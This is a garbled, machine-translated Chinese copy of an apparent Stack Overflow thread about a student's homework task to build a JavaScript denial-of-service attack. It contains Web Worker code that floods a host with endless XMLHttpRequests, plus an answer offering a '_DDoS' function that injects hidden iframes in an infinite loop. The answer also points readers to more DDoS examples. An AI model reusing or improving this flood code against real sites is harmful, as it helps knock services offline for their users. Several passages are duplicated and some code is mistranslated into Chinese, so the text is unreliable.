使用WebWorkers的JavaScript DoS攻击_Javascript_Xmlhttprequest_Web Worker_Denial Of Service

使用WebWorkers的JavaScript DoS攻击

javascript

使用WebWorkers的JavaScript DoS攻击,javascript,xmlhttprequest,web-worker,denial-of-service,Javascript,Xmlhttprequest,Web Worker,Denial Of Service,在大学里，我们得到了一份“家庭作业”，试图实施拒绝服务攻击。我决定走一条稍微不同的路。我尝试使用JavaScript执行它问题是： <script> for(var i = 0; i< 50; i++) { worker = new Worker("worker.js"); worker.postMessage('Hello World'); } </script> self.addEventListener('m

在大学里，我们得到了一份“家庭作业”，试图实施拒绝服务攻击。我决定走一条稍微不同的路。我尝试使用JavaScript执行它

问题是：

<script>
    for(var i = 0; i< 50; i++) {
        worker = new Worker("worker.js");
        worker.postMessage('Hello World');
    }
</script>

self.addEventListener('message', function(e) {
    while(1) {
            var xmlHttp = new XMLHttpRequest();
            xmlHttp.onreadystatechange = function() { 
            if (xmlHttp.readyState == 4 && xmlHttp.status == 200)
                    callback(xmlHttp.responseText);
            }
            xmlHttp.open("GET", "http://127.0.0.1", true);
            xmlHttp.send(null);
    }
}, false);

有可能做到这一点吗
如果我在环回上执行HttpRequest，我会看到由于http端口溢出而导致任何网站不可接受的结果吗
有没有比我的代码更好的代码

index.html:

<script>
    for(var i = 0; i< 50; i++) {
        worker = new Worker("worker.js");
        worker.postMessage('Hello World');
    }
</script>

self.addEventListener('message', function(e) {
    while(1) {
            var xmlHttp = new XMLHttpRequest();
            xmlHttp.onreadystatechange = function() { 
            if (xmlHttp.readyState == 4 && xmlHttp.status == 200)
                    callback(xmlHttp.responseText);
            }
            xmlHttp.open("GET", "http://127.0.0.1", true);
            xmlHttp.send(null);
    }
}, false);

谢谢你的任何意见

因此，首先，如果我能改进这段代码，我将使用setInterval而不是while（1）。其次，我在这里找到了一个更简单的版本：

function _DDoS(url){
    document.body.innerHTML+='<iframe src="'+url+'" style="display:none;">   </iframe>';
}
for(;;){
 setTimeout(_DDoS("http://localhost"),10);
}

功能\u DDoS（url）{
document.body.innerHTML+=''；
}
对于（；；）{
设置超时（_DDoS（“http://localhost"),10);
}

只需搜索javascript ddos，您将发现许多示例

，因此首先，如果我可以改进此代码，我将使用setInterval而不是while（1）。其次，我在这里找到了一个更简单的版本：

function _DDoS(url){
    document.body.innerHTML+='<iframe src="'+url+'" style="display:none;">   </iframe>';
}
for(;;){
 setTimeout(_DDoS("http://localhost"),10);
}

功能\u DDoS（url）{
document.body.innerHTML+=''；
}
对于（；；）{
设置超时（_DDoS（“http://localhost"),10);
}

只需搜索javascript ddos，您会发现许多示例

我不确定，但这比远程服务器（如果您选择本地主机以外的服务器）更可能导致您自己的计算机崩溃

，而（1）

当您运行显示的代码时发生了什么？（1），浏览器是否很酷？@nnnnnn浏览器似乎很好，因为网络工作者在幕后做了一切。在开发者工具中，您可以清楚地看到正在发送请求，但我可以毫无问题地访问我想要的任何网站。这属于codereview.stackexchange.com或security.stackexchange.com。我不确定，但这比远程服务器更可能使您自己的计算机崩溃（如果您选择的不是本地主机）

while（1）

运行显示的代码时发生了什么？（1），浏览器是否很酷？@nnnnnn浏览器似乎很好，因为网络工作者在幕后做了一切。在开发人员工具中，您可以清楚地看到请求正在发送，但是我可以毫无问题地访问任何我想要的网站。这属于codereview.stackexchange.com或security.stackexchange.com。